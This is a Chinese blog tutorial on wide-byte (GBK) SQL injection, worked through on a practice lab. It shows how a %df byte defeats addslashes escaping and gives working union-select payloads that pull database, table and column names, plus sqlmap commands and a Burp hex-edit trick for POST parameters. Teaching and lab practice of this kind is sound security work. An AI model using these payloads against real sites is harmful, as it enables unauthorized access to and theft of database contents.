SQL注入之宽字节注入

最新推荐文章于 2024-04-14 19:24:54 发布
最新推荐文章于 2024-04-14 19:24:54 发布
阅读量1.8k 收藏 4
点赞数 1
分类专栏: 渗透测试 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68233961/article/details/125836025
版权

在了解宽字节之前,我们可以先来了解一下PHP的魔术引号

魔术引号(其实就是PHP的防御函数):

magic_quotes_gpc(魔术引号开关)这个在PHP的高版本(5.4.45及以上)里面取消掉了,转化为了一种函数(addslashes()函数)

作用:当PHP的传参中有特殊字符就会再前面加转义字符'\',来做一定的过滤 单引号和双引号内的一切都是字符串,那我们输入的东西如果不能闭合掉单引号和双引号,我们的输入就不会当作代码执行,就无法产生SQL注入,那我们该怎么办?

绕过方法:

        1、寻找不需要闭合的地方

        2、仔细查看作用域(影响范围)

        3、宽字节注入

在讲宽字节之前,我们需要先了解一下编码,每个国家的语言和文字都不同,但是对于计算机来说,到了最后都是二进制,所以在计算机的世界里,汉字最后也是由数字组成的,每个国家都有自己的一套编码,因为万国码不一定会有自己国家的一些字,像我们国家就是GBK编码,而编码不同会造成歧义,GBK编码是多字符编码(多个字符组在一起成为一个字),使用了双字节编码的方案,所以GBK编码一个汉子占用两字节,而UTF-8编码占用三个字节,(asci编码上面能查到的都是单字节)

两个单字节在一起,就有可能变为一个双字节,我们输入的单引号被转义了,原本的语句是:select *from news where id='1\'',而当数据库使用的是GBK编码时,我们输入某一个字符,语句就变为了select *from news where id='1?\'',问号和反斜杠组合在一起,可能变为了某个汉字,这样我们的单引号就逃逸了出来,这就是宽字节注入的核心(URL编码的核心是16进制)

数据库使用了GBK编码,就可能存在宽字节注入

那么如何判断数据库使没使用GBK编码呢?试试不就知道了吗

接下来就是进入靶场了

我们怎么样才能知道哪些字符可以和反斜杠组合在一起成为汉字呢,我们可以在百度上面查一波

进入百度,我们在URL栏处将编码改为GBK,然后在1的这个输入%df%5c(反斜杠url编码之后就是%5c),只要能出现汉字的就行了,像%dd、%95这些都能和反斜杠组合在一起成为汉字

 进入靶场,在url传参,输入%df' and 1=1 -- qwe,页面有数据,输入%df' and 1=2 -- qwe,页面出错,初步判断出这里存在SQL注入

 接下来就是判断字段数了,%df' order by 1、2、3 -- qwe,判断出有三个字段数,然后查看回显点,%df' union select 1,2,3 -- qwe,判断出2、3是回显点,接下来就是老流程了,拿库名,然后表名,然后字段名,可以按照我们之前学的来搞就好了

 库名:%df' union select 1,2,database() -- qwe

表名:%df' union select 1,2,table_name from information_schema.tables where table_schema=database() -- qwe

查询字段的时候,我们之前写的语句是这样的:union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name='表名',这里我们会用到单引号,而我们只要写单引号,就会被转义,我们如何绕过呢?

第一种方法就是套娃法,如下:

字段名:%df' union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database()) -- qwe

第二种方法,十六进制法

mysql数据库支持十六进制输入,我们在www.sojson.com这个网站将我们得到的表名user转换为十六进制,然后再输入,当然,你只输入数字,数据库是无法识别它到底是十六进制还是只是数字的,所以我们需要给他一个表示,就是0x,在URL栏输入%df' union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=0x75736572 -- q,SQLmap跑宽字节的话,需要我们手动给他闭合(当然也不要忘记给他加等级),sqlmap.py --level 3 --risk 2 -u 网址%df,

GET传参的我们可以直接传一个%df,而POST传参的,我们传%df是没有用的,POST传参是不会URL编码的,那我们怎么办呢

我们可以利用burp抓包来改他的十六进制的值,我们在输入框中输入admin a' or 1=1 -- qwe,然后抓包,点击hex,在右侧找到我们输入的那个a,a在十六进制里面是61,将61改为df就行了

 当然,我们也可以直接传参汉字,前提是数据库是UTF-8编码,

输入 风' union select 1,2,3 -- q,这个靶场是没有回显点的,所以我们还需要结合盲注学到的知识去做,当然,可以直接上SQLmap,burp抓包,将数据包复制下来,放到和SQLmap同目录下,然后跑就行了

 

安澈yykl
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第十九节 宽字节SQL注入-01
09-15
第十九节 宽字节SQL注入-01
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB数据库)、SQL...
渗透测试-SQL注入宽字节注入
lza20001103的博客
04-20 7726
渗透测试-SQL注入宽字节注入
SQL注入宽字节注入
qq_68163788的博客
01-31 1424
宽字节注入中,攻击者利用数据库编码中的特性,通常是双字节字符编码(如GB2312、GBK等),来绕过应用程序对输入进行的过滤。攻击者可以通过在输入中插入特定的编码字符来修改SQL查询的语义,从而执行恶意操作。这种技术通常用于绕过应用程序对单字节字符的过滤,使得攻击者能够成功注入恶意SQL代码。 举个例子,假设应用程序在处理用户输入时没有正确过滤并且使用了双字节字符编码。攻击者可以在输入中插入特定的双字节字符,使得SQL查询被修改,从而绕过认证、获取敏感数据或者修改数据库内容。
sql注入宽字节注入详解
最新发布
Yuppie001的博客
04-14 450
1.什么是宽字节?2.宽字节注入原理二.sqli-labs-36关。
SQL注入宽字节注入:原理、利用
07-14 1688
SQL-宽字节注入
网络安全SQL注入 -- 宽字节注入
yyyyyybw的博客
09-26 242
宽字节注入是一种利用字符编码漏洞的SQL注入攻击技术。当应用程序没有正确处理用户输入数据并在构造SQL查询语句时使用了错误的字符编码时,攻击者可以通过插入特殊编码的宽字符来绕过输入过滤和SQL语句构造的限制。宽字符是指UTF-8编码中的特定字符,如%df%27,其中%df是宽字节的前缀,%27是单引号的URL编码。这样,攻击者可以注入恶意的SQL语句,绕过验证并获取未经授权的数据。
第四期-SQL注入的入坑之道.pdf
08-08
SQL 注入SQL 注入原理篇 - SQL 注入初级 SQL 注入中级 SQL 注入高级 SQL 工具篇 DNS 注入 &sqlmap 进行 DNS 注入 11 种常见 SQLmap 使用方法 SQL注入工具 SQL注入工具拓展篇 SQL 注入实战篇 - ...宽字节注入详解
超级SQL注入工具
04-08
超级SQL注入工具支持盲注环境获取世界各国语言数据,直接秒杀各种注入工具在盲注环境下无法支持中文等多字节编码的数据。 工具特点: 1. 支持任意地点出现的任意SQL注入 2. 支持各种语言环境。大多数注入工具在盲注...
Web安全SQL注入精讲视频.zip
04-16
目录网盘文件永久链接 1-1 SQL注入的业务场景以及危害.mp4 1-2 真实网站中的SQL注入是怎么样的.mp4 1-3 SQL为什么有那么多分类.mp4 ...3-5 宽字节注入.mp4 3-6 过滤函数绕过(综合实验).mp4 4-1SQL注入防御.mp4
SQL宽字节注入
qq_45521281的博客
05-28 596
GBK 占用两字节 ASCII占用一字节 PHP中编码为GBK,函数执行添加的是ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等宽字节字符集。 大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 %df\’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MySQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗,也就是说:%df\.
SQL注入 - 宽字节注入
HAKUNAMATATATTA的博客
09-05 969
宽字节注入主要是绕过魔术引号的,数据库解析中除了UTF-8编码外的所有编码如:GBK等都有可能存在宽字节注入
SQL注入——宽字节注入
weixin_74991270的博客
10-10 315
1.转义符“\”有些符号想让他当作单纯的字符,而不是当作符号的时候,一般可以用: \符号比如:\’ \\’   这种情况下,‘和"将被当作正常的字符在数据库之中’与"几乎没有区别,在php之中 ’ 包括的内容完全当作字符串,而 " 包括的内容会进一步进行解析例如:$a=‘hello’;echo ‘$a’;//输出:aecho “$a”;//输出:hello2.为什么产生编码:--为了处理英文字符,产生了ASCII码。
网络安全SQL注入--宽字节注入
边缘拼命划水的小陈
04-07 466
我们需要构造成select * from students where name ='運',就可以使用联合查询了。select * from users where name = '\'' 此时因为有两个引号会报错。id值输入1%df%27%20–%20。id值输入1’此时识别结果为1’接来下就可以使用联合查询了。
sql宽字节注入
qq_63157899的博客
04-07 4685
sql注入中最关键的一步就是将引号进行闭合,而常见的addslashes()函数、mysql_escape_string函数、get_magic_quotes_gpc()函数、mysql_real_escape_string()函数的使用将引号进行了转义,这时我们要绕过这些函数进行注入,宽字节注入就是其中一种方法。 何时能进行宽字节注入 1.mysql数据库使用GBK编码 2.对引号进行了转义(加\) 特殊情况: 1.数据库使用了安全的编码模式 2.使用了iconv() 函数进行一些特殊
宽字节注入讲解-墨者学院(SQL注入漏洞测试(宽字节))
T1ngSh0w的博客
09-18 4833
宽字节注入原理讲解+墨者学院(SQL注入漏洞测试(宽字节))题目详解
SQL 注入的宽字节注入的原理
06-09
宽字节注入是一种常见的 SQL 注入技术,它利用了一些编码方式对非 ASCII 字符进行编码的特点,从而绕过某些安全机制,达到执行恶意 SQL 语句的目的。 宽字节注入的原理是将非 ASCII 字符编码为多个 ASCII 字符,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值